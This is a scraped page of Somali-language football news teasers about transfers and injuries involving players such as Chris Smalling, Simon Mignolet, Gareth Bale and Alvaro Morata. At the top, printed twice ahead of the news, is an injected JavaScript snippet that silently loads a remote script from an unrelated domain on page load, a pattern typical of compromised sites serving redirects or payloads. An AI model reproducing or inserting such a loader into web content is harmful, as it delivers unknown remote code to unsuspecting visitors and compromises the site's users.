;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
Daafaca dhexe ee Manchester United Chris Smalling ayaa qaba in da’yarka kooxdaasi ee Cameron Borthwick-Jackson uu mustaqbal ifaya horyaalo kadib markii uu xidigaan qaab ciyaareed mideysan...
Orodyahanka ree Jamaica ee Usain Bolt ayaan wax sir ah ka dhigan in uu maalin uun u ciyaaro kooxda Manchester United laakiin boqorka orodka ee Bolt...
Goolhayaha reer Belgium Simon Mignolet ii cadaadis xoogan saaran yahay ayaa ku ku guuleestay inuu heshiis waqtigiisa dheer yahay u saxiixo Liverpool. Simon Mignolet oo lagu...
Kooxda man united ayaa Lagu soo wara mayaa in ay ku dhowdahay xidiga kooxda Benfica renato sanches, sida ay sheegtay Daily mail Xidigan oo 18 jir...
Difaaca bidix ee kooxda Arsinal Nacho Monreal ayaa qalinka ku duugay heshiis cusub oo uu u saxiixay kooxdiisa Arsinal wuxuuna heshiiskan meesha ka saarayaa kooxo badan...
Dhaawacii lixaad ee Gareth Bale soo gaara iyo dhibaatada ka heysata muruqa kubka ayay u muuqataa inuu garoomada kaga maqnaan doono muddo labo ilaa seddex isbuuc...
Sida ay qoreen warbixino ka imaanaya Spain ciyaariyahanka weerarka uga ciyaara kooxda Bayern Munich Roberto Lewandowski ayaa daneynaya inuu ku biiro kooxda Paris Saint Germain. Fichajes.net...
naadiga AC Milan ayaa doonaysa in ay la soo wareegto xidiga kooxda Manchester United ee Marouane Fellaini, waxaana kooxda horyaalka Talyaaniga ka dhisan ee Milan ay...
Gudoomiyaha kooxda Napoli Aurelio De Laurentiis ayaa ka jawaab celiyay hadal kasoo yeeray maamulka kooxda Bayern Munich oo ahaa inay xiiseenayaan saxiixa Gonzalo Higuain. Gonzalo Higauin...
Qaar ka mid ah saxaafada Ingiriiska ayaa siweyn u hadal heyn in kooxda Arsenal ay xagaaga dambe ku guuleesan doonto saxiixa Alvaro Morata oo weerarka kaga...